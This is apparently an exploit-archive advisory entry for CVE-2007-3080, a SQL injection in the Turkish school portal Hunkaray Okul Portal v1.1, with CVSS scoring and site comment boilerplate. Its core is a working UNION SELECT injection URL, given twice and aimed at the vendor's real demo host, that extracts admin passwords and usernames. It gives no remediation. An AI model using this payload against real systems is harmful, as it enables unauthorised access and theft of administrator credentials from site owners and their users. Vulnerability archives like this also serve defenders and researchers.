Hunkaray Okul Portaly v1.1 (tr) sql injection

2007.06.05

Credit: ertuqrul

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2007-3080

CWE: N/A

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

############################################
Hnkaray Okul Portal v1.1 (tr) sql injection

http://www.hunkaray.net/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin

Hnkaray Okul Portal v1.1 (tr) (not free) 75 ytl

ertuqrul

ertuqrul@yahoo.com

demo:http://www.hunkaray.net/okul/

http://www.aspindir.com/indir.asp?id=4737

sql query : haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Hunkaray Okul Portaly v1.1 (tr) sql injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.